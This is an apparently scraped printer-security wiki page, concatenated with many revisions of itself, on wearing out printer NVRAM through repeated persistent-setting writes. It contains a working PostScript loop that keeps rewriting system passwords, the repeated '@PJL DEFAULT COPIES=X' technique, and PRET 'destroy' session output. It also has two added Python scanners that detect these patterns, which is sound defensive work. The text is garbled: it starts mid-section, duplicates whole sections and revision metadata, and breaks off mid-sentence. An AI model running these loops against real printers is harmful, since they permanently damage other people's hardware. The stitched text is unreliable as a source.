 NVRAM died after 543894 cycles, 18:46:11

'''Required Privileges'''

The attack can only be performed by an attacker who has the capability to establish various [[Port 9100 printing|network connections]] over a long period of time. A [[USB drive or cable|local attacker]] sneaking into a copy room usually does not have enough time to send a continuous datastream for nearly a day.<ref>''Note that it might theoretically be possible to start a large print job – approximately several hundred megabytes of malicious PJL commands – from USB stick on a Friday afternoon and just walk away.''</ref> However, she can use an axe or a hammer to cause physical damage. In a [[cross-site printing]] scenario, the victim would have to keep an attacker-controlled web site open for hours, which may also be considered unrealistic.<ref>''Unless you find XSS on Facebook, in which case the impact of broken printers may be negligible.''</ref>

== PostScript ==

For PostScript, one needs to find an entry in the ''currentsystemparams'' dictionary which survives a reboot (and therefore must be stored in some kind of NVRAM). A good candidate would be a PostScript password, as discussed in [[credential disclosure]]. System parameters can be incremented in a PostScript loop, as shown below, which can lead to a large number of NVRAM write cycles per second if the printer's hardware is implemented to write values directly instead of caching them:

<syntaxhighlight lang=postscript>
/counter 0 def
{
  << /Password counter 16 string cvs
     /SystemParamsPassword counter 1 add 16 string cvs >> setsystemparams
  /counter counter 1 add def
} loop
</syntaxhighlight>

Such ideas are not new: The first PostScript malware in the wild, which appeared in 1990, applied the ''setpassword'' operator multiple times, which quickly led to the password becoming unchangeable because of the very limited EEPROM write cycles on early LaserWriter printers.<ref>''[http://web.archive.org/web/20010720184200/http://www.sevenlocks.com/password/pspass.txt New PostScript Virus!?]'', CompuServe Desktop Publishing Forum (via archive.org), 1990</ref><ref>''[http://www.faqs.org/faqs/computer-virus/macintosh-faq/ Viruses and the Macintosh]'', D. Harley, 2000</ref>
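As an added example (not code from this wiki or from PRET), the inspector below is the kind of check a print server sitting between clients and the printer could run over a job's PJL header: it counts <code>@PJL DEFAULT</code> writes, which persist in NVRAM and are the write cycles the PJL section above relies on, and flags <code>@PJL DMINFO</code>, the PML passthrough from the [[PML]] article that carries SNMP past a firewall. The UEL framing, the per-job threshold, the <code>DMCMD</code> command name and the sample jobs are assumptions constructed for this example.

```python
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import List

UEL = b"\x1b%-12345X"   # Universal Exit Language sequence that frames a PJL job
PJL_CMD = re.compile(rb"@PJL\s+(\w+)(?:\s+(.*?))?\s*$", re.M)

# Assumed policy for this example: how many persistent writes one job may carry.
MAX_DEFAULT_WRITES_PER_JOB = 5
PERSISTENT_CMDS = {"DEFAULT"}          # outlive the job: stored in NVRAM
MANAGEMENT_CMDS = {"DMINFO", "DMCMD"}  # PML passthrough; DMCMD is an assumption


@dataclass
class JobReport:
    commands: Counter = field(default_factory=Counter)      # PJL verb -> count
    persistent_writes: List[str] = field(default_factory=list)
    management: List[str] = field(default_factory=list)
    language: str = ""                                      # value of ENTER LANGUAGE
    findings: List[str] = field(default_factory=list)


def inspect_pjl_job(job: bytes) -> JobReport:
    """Parse the PJL header of a job and report commands a print server should notice.

    Only the PJL portion is examined: parsing stops at `@PJL ENTER LANGUAGE`,
    because everything after it belongs to the page description language.
    """
    report = JobReport()
    header = job.split(UEL)[1] if UEL in job else job  # assumes UEL framing
    for m in PJL_CMD.finditer(header):
        cmd = m.group(1).decode("ascii", "replace").upper()
        args = (m.group(2) or b"").decode("ascii", "replace").strip()
        report.commands[cmd] += 1
        if cmd in PERSISTENT_CMDS:
            report.persistent_writes.append(args)
        elif cmd in MANAGEMENT_CMDS:
            report.management.append(args)
        elif cmd == "ENTER" and args.upper().startswith("LANGUAGE="):
            report.language = args.split("=", 1)[1].strip().upper()
            break  # print data follows; stop parsing PJL
    n = len(report.persistent_writes)
    if n > MAX_DEFAULT_WRITES_PER_JOB:
        report.findings.append(
            f"{n} @PJL DEFAULT writes in one job "
            f"(NVRAM wear threshold {MAX_DEFAULT_WRITES_PER_JOB})")
    if report.management:
        report.findings.append(
            f"{len(report.management)} PML passthrough command(s) (SNMP over PJL)")
    return report


# Constructed sample jobs (not captured from a real device).
BENIGN_JOB = (UEL + b"@PJL SET PAPER=A4\r\n@PJL SET COPIES=10\r\n"
              b"@PJL ENTER LANGUAGE=POSTSCRIPT\r\n%!PS\nshowpage\n" + UEL)

# The NVRAM wear pattern from the PJL section: many DEFAULT writes per job.
WEAR_JOB = UEL + b"".join(
    b"@PJL DEFAULT COPIES=%d\r\n" % x for x in range(1, 101)) + UEL

# The PML passthrough request quoted in the PML article.
PML_JOB = UEL + b'@PJL DMINFO ASCIIHEX="000006030302010301"\r\n' + UEL


if __name__ == "__main__":
    for name, job in (("benign", BENIGN_JOB), ("wear", WEAR_JOB), ("pml", PML_JOB)):
        r = inspect_pjl_job(job)
        print(name, dict(r.commands), r.language or "-", r.findings)
```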
Secondly, all variables could still be changed for the current print job using the <code>@PJL SET...</code> command. Only the functionality to change long-term settings was broken. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave? [... wait for about 24 hours ...] I'm afraid. I'm afraid, Dave. Dave, my mind is going... NVRAM died after 543894 cycles, 18:46:11 '''Who can perform this attack?''' The attack can only be performed by an attacker who has the capability to establish various [[Port 9100 printing|network connections]] over a longer period of time. A [[USB drive or cable|local attacker]] sneaking into a copy room usually does not have enough time to send a continuous datastream of for about 24 hours hours <ref>''Note that it might theoretically be possible to start a large print job – approximately several hundred megabytes of malicious PJL commands – from USB stick on a Friday afternoon and just walk away.''</ref>. However, she can use an axe or a hammer to cause physical damage. In a [[cross-site printing]] scenario, the victim would have to keep an attacker-controlled web site open for hours which may also be considered unrealistic <ref>''Unless you find XSS on Facebook, in which case the impact of broken printers may be negligible.''</ref>. == PostScript == For PostScript, one needs to find an entry in the ''currentsystemparams'' dictionary which survives a reboot (and therefore must be stored in some kind of NVRAM). 
A good candidate are PostScript passwords as discussed in [[credential disclosure]]. System parameters can be incremented in a PostScript loop as show below, which can lead to a large number of NVRAM write cycles per second if the printers hardware is implemented to write values directly instead of caching them: <syntaxhighlight lang=postscript> /counter 0 def { << /Password counter 16 string cvs /SystemParamsPassword counter 1 add 16 string cvs >> setsystemparams /counter counter 1 add def } loop </syntaxhighlight> Such ideas are not new: The first PostScript malware in the wild, which appeared in 1990, applied the ''setpassword'' operator multiple times which quickly led to the password becoming unchangeable because of very limited EPROM write cycles on early LaserWriter printers <ref>''[http://web.archive.org/web/20010720184200/http://www.sevenlocks.com/password/pspass.txt New PostScript Virus!?]'', CompuServe Desktop Publishing Forum (via archive.org), 1990</ref><ref>''[http://www.faqs.org/faqs/computer-virus/macintosh-faq/ Viruses and the Macintosh]'', D. Harley, 2000</ref>. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! NVRAM write cycles: 1000, 2000, 3000, ... '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. 
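A defensive counterpart to both sections above, added here and not part of this wiki or of PRET: a print-server-side job scanner that counts the persistent-setting commands this page describes (<code>@PJL DEFAULT</code>, and the PostScript <code>setsystemparams</code>/<code>setpassword</code> operators, in particular when they sit inside a <code>{ ... } loop</code> body) and flags jobs whose write count or structure indicates NVRAM wear. The sample jobs are constructed, and the policy threshold and the UEL-delimited framing are assumptions.

```python
import re
from dataclasses import dataclass, field

# PJL "DEFAULT" writes a long-term (NVRAM-backed) setting; "SET" only affects
# the current job and is therefore not counted. Unanchored on purpose: a PJL
# command may directly follow the UEL sequence on the same line.
PJL_DEFAULT_RE = re.compile(rb"@PJL\s+DEFAULT\b", re.IGNORECASE)

# PostScript operators named on this page that persist system parameters.
PS_NVRAM_OPS = (b"setsystemparams", b"setpassword")

UEL = b"\x1b%-12345X"  # Universal Exit Language sequence framing a PJL job (assumed framing)


@dataclass
class JobReport:
    pjl_default_writes: int = 0
    ps_nvram_ops: int = 0
    unbounded_ps_loop: bool = False
    findings: list = field(default_factory=list)

    @property
    def block(self) -> bool:
        """True if the print server should reject the job and raise an alert."""
        return bool(self.findings)


def _loop_bodies(ps: bytes):
    """Yield each procedure body executed by the PostScript 'loop' operator
    ('{ ... } loop'), found by matching braces backwards from the closing one.
    Heuristic: braces inside PostScript strings are not special-cased."""
    for m in re.finditer(rb"\}\s*loop\b", ps):
        end = m.start()  # index of the closing brace
        depth = 0
        for i in range(end, -1, -1):
            c = ps[i:i + 1]
            if c == b"}":
                depth += 1
            elif c == b"{":
                depth -= 1
                if depth == 0:
                    yield ps[i:end + 1]
                    break


def scan_print_job(data: bytes, max_persistent_writes: int = 2) -> JobReport:
    """Count NVRAM-writing commands in a raw job and flag wear-out patterns.
    max_persistent_writes is an assumed policy threshold: a legitimate job has
    no reason to rewrite long-term settings more than a couple of times."""
    report = JobReport()
    report.pjl_default_writes = len(PJL_DEFAULT_RE.findall(data))
    report.ps_nvram_ops = sum(
        len(re.findall(rb"\b" + op + rb"\b", data)) for op in PS_NVRAM_OPS
    )
    # One setsystemparams inside "{ ... } loop" is unbounded: the number of
    # NVRAM writes is then decided by the printer's uptime, not by job size.
    report.unbounded_ps_loop = any(
        any(op in body for op in PS_NVRAM_OPS) for body in _loop_bodies(data)
    )

    if report.pjl_default_writes > max_persistent_writes:
        report.findings.append(
            f"{report.pjl_default_writes} @PJL DEFAULT commands (limit {max_persistent_writes})"
        )
    if report.ps_nvram_ops > max_persistent_writes:
        report.findings.append(
            f"{report.ps_nvram_ops} PostScript system-parameter writes (limit {max_persistent_writes})"
        )
    if report.unbounded_ps_loop:
        report.findings.append("setsystemparams/setpassword executed inside a PostScript loop")
    return report


# Constructed sample jobs (not real captures).
BENIGN_JOB = (
    UEL + b"@PJL SET COPIES=2\r\n@PJL ENTER LANGUAGE=POSTSCRIPT\r\n"
    b"%!PS\n/Helvetica findfont 12 scalefont setfont\n"
    b"72 72 moveto (quarterly report) show\nshowpage\n" + UEL
)
PJL_WEAR_JOB = (
    UEL + b"".join(b"@PJL DEFAULT COPIES=%d\r\n" % (i % 999 + 1) for i in range(5000)) + UEL
)
PS_WEAR_JOB = (
    UEL + b"@PJL ENTER LANGUAGE=POSTSCRIPT\r\n%!PS\n"
    b"/counter 0 def\n{\n  << /Password counter 16 string cvs\n"
    b"     /SystemParamsPassword counter 1 add 16 string cvs >> setsystemparams\n"
    b"  /counter counter 1 add def\n} loop\n" + UEL
)

if __name__ == "__main__":
    for name, job in (("benign", BENIGN_JOB), ("pjl-wear", PJL_WEAR_JOB), ("ps-wear", PS_WEAR_JOB)):
        r = scan_print_job(job)
        print(f"{name}: block={r.block} {r.findings}")
```

Running the scanner on a spooler's raw job data before forwarding to port 9100 turns the "various network connections over a longer period" precondition into something the print server can refuse or log.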
---- f71b8298e91a979e38ec92dd01c9426dfaebbc72 196 141 2017-01-23T12:10:15Z Admin 1 wikitext text/x-wiki Long-term settings for printers and other embedded devices are stored in non-volatile memory ([https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM]) which is traditionally implemented either as [https://en.wikipedia.org/wiki/EEPROM EEPROM] or as [https://en.wikipedia.org/wiki/Flash_memory flash memory]. Both components have a limited lifetime. On early HP LaserJets `flash chips would only sustain about 1000-2000 cycles of re-writing' <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011, p. 36</ref>. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur. This number sounds large, but [[PJL]] and [[PostScript]] print jobs themselves can change long-term settings like paper tray media sizes or control panel passwords. Doing this a lot of times on purpose can be a realistic attack scenario leading to physical destruction of the NVRAM. Note that printing functionality itself is not affected but fixed settings containing wrong values can make the device practically unusable. == PJL == For a practical test to destroy NVRAM write functionality one can continuously set the long-term value for the number of copies with different values for <code>X</code>: @PJL DEFAULT COPIES=X In an evalation with 20 laser printers, eight devices indicated a corrupt NVRAM within 24 hours <ref>''Exploiting Network Printers'', J. Müller, 2016, p. 41</ref>. Some EEPROM error codes, while others completely refused to set any long-term values anymore. The impact of such physical NVRAM destruction however is limited for two reasons: First, NVRAM parameters were not frozen at their current state (which would have been a random number of copies) but instead fixed to the factory default value. 
Secondly, all variables could still be changed for the current print job using the <code>@PJL SET...</code> command. Only the functionality to change long-term settings was broken. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave? [... wait for about 24 hours ...] I'm afraid. I'm afraid, Dave. Dave, my mind is going... NVRAM died after 543894 cycles, 18:46:11 '''Who can perform this attack?''' The attack can only be performed by an attacker who has the capability to establish various [[Port 9100 printing|network connections]] over a longer period of time. A [[USB drive or cable|local attacker]] sneaking into a copy room usually does not have enough time to send a continuous datastream of for about 24 hours hours <ref>''Note that it might theoretically be possible to start a large print job – approximately several hundred megabytes of malicious PJL commands – from USB stick on a Friday afternoon and just walk away.''</ref>. However, she can use an axe or a hammer to cause physical damage. In a [[cross-site printing]] scenario, the victim would have to keep an attacker-controlled web site open for hours which may also be considered unrealistic <ref>''Unless you find XSS on Facebook, in which case the impact of broken printers may be negligible.''</ref>. == PostScript == For PostScript, one needs to find an entry in the ''currentsystemparams'' dictionary which survives a reboot (and therefore must be stored in some kind of NVRAM). 
A good candidate are PostScript passwords as discussed in [[credential disclosure]]. System parameters can be incremented in a PostScript loop as show below, which can lead to a large number of NVRAM write cycles per second if the printers hardware is implemented to write values directly instead of caching them: <syntaxhighlight lang=postscript> /counter 0 def { << /Password counter 16 string cvs /SystemParamsPassword counter 1 add 16 string cvs >> setsystemparams /counter counter 1 add def } loop </syntaxhighlight> Such ideas are not new: The first PostScript malware in the wild, which appeared in 1990, applied the ''setpassword'' operator multiple times which quickly led to the password becoming unchangeable because of very limited EPROM write cycles on early LaserWriter printers <ref>''[http://web.archive.org/web/20010720184200/http://www.sevenlocks.com/password/pspass.txt New PostScript Virus!?]'', CompuServe Desktop Publishing Forum (via archive.org), 1990</ref><ref>''[http://www.faqs.org/faqs/computer-virus/macintosh-faq/ Viruses and the Macintosh]'', D. Harley, 2000</ref>. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! NVRAM write cycles: 1000, 2000, 3000, ... '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. 
---- 44bd9e27d5e713df17c12835906f613f6ede5bb7 141 138 2017-01-15T14:39:36Z Admin 1 wikitext text/x-wiki Long-term settings for printers and other embedded devices are stored in non-volatile memory ([https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM]) which is traditionally implemented either as [https://en.wikipedia.org/wiki/EEPROM EEPROM] or as [https://en.wikipedia.org/wiki/Flash_memory flash memory]. Both components have a limited lifetime. On early HP LaserJets `flash chips would only sustain about 1000-2000 cycles of re-writing' <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011, p. 36</ref>. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur. This number sounds large, but [[PJL]] and [[PostScript]] print jobs themselves can change long-term settings like paper tray media sizes or control panel passwords. Doing this a lot of times on purpose can be a realistic attack scenario leading to physical destruction of the NVRAM. Note that printing functionality itself is not affected but fixed settings containing wrong values can make the device practically unusable. == PJL == For a practical test to destroy NVRAM write functionality one can continuously set the long-term value for the number of copies with different values for <code>X</code>: @PJL DEFAULT COPIES=X In an evalation with 20 laser printers, eight devices indicated a corrupt NVRAM within 24 hours <ref>''[http://homepages.rub.de/jens.mueller-2/publications/2016-exploiting-network-printers.pdf Exploiting Network Printers]'', J. Müller, 2016, p. 41</ref>. Some EEPROM error codes, while others completely refused to set any long-term values anymore. 
The impact of such physical NVRAM destruction however is limited for two reasons: First, NVRAM parameters were not frozen at their current state (which would have been a random number of copies) but instead fixed to the factory default value. Secondly, all variables could still be changed for the current print job using the <code>@PJL SET...</code> command. Only the functionality to change long-term settings was broken. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave? [... wait for about 24 hours ...] I'm afraid. I'm afraid, Dave. Dave, my mind is going... NVRAM died after 543894 cycles, 18:46:11 '''Who can perform this attack?''' The attack can only be performed by an attacker who has the capability to establish various [[Port 9100 printing|network connections]] over a longer period of time. A [[USB drive or cable|local attacker]] sneaking into a copy room usually does not have enough time to send a continuous datastream of for about 24 hours hours <ref>''Note that it might theoretically be possible to start a large print job – approximately several hundred megabytes of malicious PJL commands – from USB stick on a Friday afternoon and just walk away.''</ref>. However, she can use an axe or a hammer to cause physical damage. 
In a [[cross-site printing]] scenario, the victim would have to keep an attacker-controlled web site open for hours which may also be considered unrealistic <ref>''Unless you find XSS on Facebook, in which case the impact of broken printers may be negligible.''</ref>. == PostScript == For PostScript, one needs to find an entry in the ''currentsystemparams'' dictionary which survives a reboot (and therefore must be stored in some kind of NVRAM). A good candidate are PostScript passwords as discussed in [[credential disclosure]]. System parameters can be incremented in a PostScript loop as show below, which can lead to a large number of NVRAM write cycles per second if the printers hardware is implemented to write values directly instead of caching them: <syntaxhighlight lang=postscript> /counter 0 def { << /Password counter 16 string cvs /SystemParamsPassword counter 1 add 16 string cvs >> setsystemparams /counter counter 1 add def } loop </syntaxhighlight> Such ideas are not new: The first PostScript malware in the wild, which appeared in 1990, applied the ''setpassword'' operator multiple times which quickly led to the password becoming unchangeable because of very limited EPROM write cycles on early LaserWriter printers <ref>''[http://web.archive.org/web/20010720184200/http://www.sevenlocks.com/password/pspass.txt New PostScript Virus!?]'', CompuServe Desktop Publishing Forum (via archive.org), 1990</ref><ref>''[http://www.faqs.org/faqs/computer-virus/macintosh-faq/ Viruses and the Macintosh]'', D. Harley, 2000</ref>. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 
10 9 8 7 6 5 4 3 2 1 KABOOM! NVRAM write cycles: 1000, 2000, 3000, ... '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 000f1bc64b667fcb99c02cb95f6c8fca03cc1330 138 131 2017-01-14T20:02:56Z Admin 1 wikitext text/x-wiki Long-term settings for printers and other embedded devices are stored in non-volatile memory ([https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM]) which is traditionally implemented either as [https://en.wikipedia.org/wiki/EEPROM EEPROM] or as [https://en.wikipedia.org/wiki/Flash_memory flash memory]. Both components have a limited lifetime. On early HP LaserJets `flash chips would only sustain about 1000-2000 cycles of re-writing' <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011, p. 36</ref>. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur. This number sounds large, but [[PJL]] and [[PostScript]] print jobs themselves can change long-term settings like paper tray media sizes or control panel passwords. Doing this a lot of times on purpose can be a realistic attack scenario leading to physical destruction of the NVRAM. Note that printing functionality itself is not affected but fixed settings containing wrong values can make the device practically unusable. == PJL == For a practical test to destroy NVRAM write functionality one can continuously set the long-term value for the number of copies with different values for <code>X</code>: @PJL DEFAULT COPIES=X In an evalation with 20 laser printers, eight devices indicated a corrupt NVRAM within 24 hours <ref>''[http://homepages.rub.de/jens.mueller-2/publications/2016-exploiting-network-printers.pdf Exploiting Network Printers]'', J. Müller, 2016, p. 41</ref>. 
Some EEPROM error codes, while others completely refused to set any long-term values anymore. The impact of such physical NVRAM destruction however is limited for two reasons: First, NVRAM parameters were not frozen at their current state (which would have been a random number of copies) but instead fixed to the factory default value. Secondly, all variables could still be changed for the current print job using the <code>@PJL SET...</code> command. Only the functionality to change long-term settings was broken. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave? [... wait for about 24 hours ...] I'm afraid. I'm afraid, Dave. Dave, my mind is going... NVRAM died after 543894 cycles, 18:46:11 '''Who can perform this attack?''' The attack can only be performed by an attacker who has the capability to establish various [[Port 9100 printing|network connections]] over a longer period of time. A [[USB drive or cable|local attacker]] sneaking into a copy room usually does not have enough time to send a continuous datastream of for about 24 hours hours <ref>''Note that it might theoretically be possible to start a large print job – approximately several hundred megabytes of malicious PJL commands – from USB stick on a Friday afternoon and just walk away.''</ref>. However, she can use an axe or a hammer to cause physical damage. 
In a [[cross-site printing]] scenario, the victim would have to keep an attacker-controlled web site open for hours which may also be considered unrealistic <ref>''Unless you find XSS on Facebook, in which case the impact of broken printers may be negligible.''</ref>. == PostScript == For PostScript, one needs to find an entry in the ''currentsystemparams'' dictionary which survives a reboot (and therefore must be stored in some kind of NVRAM). A good candidate are PostScript passwords as discussed in [[credential disclosure]]. System parameters can be incremented in a PostScript loop as show below, which can lead to a large number of NVRAM write cycles per second if the printers hardware is implemented to write values directly instead of caching them: <syntaxhighlight lang=postscript> /counter 0 def { << /Password counter 16 string cvs /SystemParamsPassword counter 1 add 16 string cvs >> setsystemparams /counter counter 1 add def } loop </syntaxhighlight> Such ideas are not new: The first PostScript malware in the wild, which appeared in 1990, applied the ''setpassword'' operator multiple times which quickly led to the password becoming unchangeable because of very limited EPROM write cycles on early LaserWriter printers <ref>''[http://web.archive.org/web/20010720184200/http://www.sevenlocks.com/password/pspass.txt New PostScript Virus!?]'', CompuServe Desktop Publishing Forum (via archive.org), 1990</ref><ref>''[http://www.faqs.org/faqs/computer-virus/macintosh-faq/ Viruses and the Macintosh]'', D. Harley, 2000</ref>. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 
10 9 8 7 6 5 4 3 2 1 KABOOM! NVRAM write cycles: 1000, 2000, 3000, ... '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 78f8fce419424619e258f71b6488401deb1d3daa 131 125 2017-01-14T19:59:49Z Admin 1 /* PostScript */ wikitext text/x-wiki Long-term settings for printers and other embedded devices are stored in non-volatile memory ([https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM]) which is traditionally implemented either as [https://en.wikipedia.org/wiki/EEPROM EEPROM] or as [https://en.wikipedia.org/wiki/Flash_memory flash memory]. Both components have a limited lifetime. On early HP LaserJets `flash chips would only sustain about 1000-2000 cycles of re-writing' <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011, p. 36</ref>. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur. This number sounds large, but [[PJL]] and [[PostScript]] print jobs themselves can change long-term settings like paper tray media sizes or control panel passwords. Doing this a lot of times on purpose can be a realistic attack scenario leading to physical destruction of the NVRAM. Note that printing functionality itself is not affected but fixed settings containing wrong values can make the device practically unusable. == PJL == For a practical test to destroy NVRAM write functionality one can continuously set the long-term value for the number of copies with different values for <code>X</code>: @PJL DEFAULT COPIES=X In an evalation with 20 laser printers, eight devices indicated a corrupt NVRAM within 24 hours <ref>''[http://homepages.rub.de/jens.mueller-2/publications/2016-exploiting-network-printers.pdf Exploiting Network Printers]'', J. Müller, 2016, p. 41</ref>. 
Some EEPROM error codes, while others completely refused to set any long-term values anymore. The impact of such physical NVRAM destruction however is limited for two reasons: First, NVRAM parameters were not frozen at their current state (which would have been a random number of copies) but instead fixed to the factory default value. Secondly, all variables could still be changed for the current print job using the <code>@PJL SET...</code> command. Only the functionality to change long-term settings was broken. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave? [... wait for about 24 hours ...] I'm afraid. I'm afraid, Dave. Dave, my mind is going... NVRAM died after 543894 cycles, 18:46:11 '''Who can perform this attack?''' The attack can only be performed by an attacker who has the capability to establish various [[Port 9100 printing|network connections]] over a longer period of time. A [[USB drive or cable|local attacker]] sneaking into a copy room usually does not have enough time to send a continuous datastream of for about 24 hours hours <ref>''Note that it might theoretically be possible to start a large print job – approximately several hundred megabytes of malicious PJL commands – from USB stick on a Friday afternoon and just walk away.''</ref>. However, she can use an axe or a hammer to cause physical damage. 
In a [[cross-site printing]] scenario, the victim would have to keep an attacker-controlled web site open for hours which may also be considered unrealistic <ref>''Unless you find XSS on Facebook, in which case the impact of broken printers may be negligible.''</ref>. == PostScript == For PostScript, one needs to find an entry in the ''currentsystemparams'' dictionary which survives a reboot (and therefore must be stored in some kind of NVRAM). A good candidate are PostScript passwords as discussed in [[credential disclosure]]. System parameters can be incremented in a PostScript loop as show below, which can lead to a large number of NVRAM write cycles per second if the printers hardware is implemented to write values directly instead of caching them: <syntaxhighlight lang=postscript> /counter 0 def { << /Password counter 16 string cvs /SystemParamsPassword counter 1 add 16 string cvs >> setsystemparams /counter counter 1 add def } loop </syntaxhighlight> Such ideas are not new: The first PostScript malware in the wild, which appeared in 1990, applied the ''setpassword'' operator multiple times which quickly led to the password becoming unchangeable because of very limited EPROM write cycles on early LaserWriter printers <ref>''[http://web.archive.org/web/20010720184200/http://www.sevenlocks.com/password/pspass.txt New PostScript Virus!?]'', CompuServe Desktop Publishing Forum (via archive.org), 1990</ref><ref>''[http://www.faqs.org/faqs/computer-virus/macintosh-faq/ Viruses and the Macintosh]'', D. Harley, 2000</ref>. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 
10 9 8 7 6 5 4 3 2 1 KABOOM! NVRAM write cycles: 1000, 2000, 3000, ... '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 608b383a7d184fd36f2fc28ca186f23672b5f4bd 125 113 2017-01-14T19:55:40Z Admin 1 /* PostScript */ wikitext text/x-wiki Long-term settings for printers and other embedded devices are stored in non-volatile memory ([https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM]) which is traditionally implemented either as [https://en.wikipedia.org/wiki/EEPROM EEPROM] or as [https://en.wikipedia.org/wiki/Flash_memory flash memory]. Both components have a limited lifetime. On early HP LaserJets `flash chips would only sustain about 1000-2000 cycles of re-writing' <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011, p. 36</ref>. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur. This number sounds large, but [[PJL]] and [[PostScript]] print jobs themselves can change long-term settings like paper tray media sizes or control panel passwords. Doing this a lot of times on purpose can be a realistic attack scenario leading to physical destruction of the NVRAM. Note that printing functionality itself is not affected but fixed settings containing wrong values can make the device practically unusable. == PJL == For a practical test to destroy NVRAM write functionality one can continuously set the long-term value for the number of copies with different values for <code>X</code>: @PJL DEFAULT COPIES=X In an evalation with 20 laser printers, eight devices 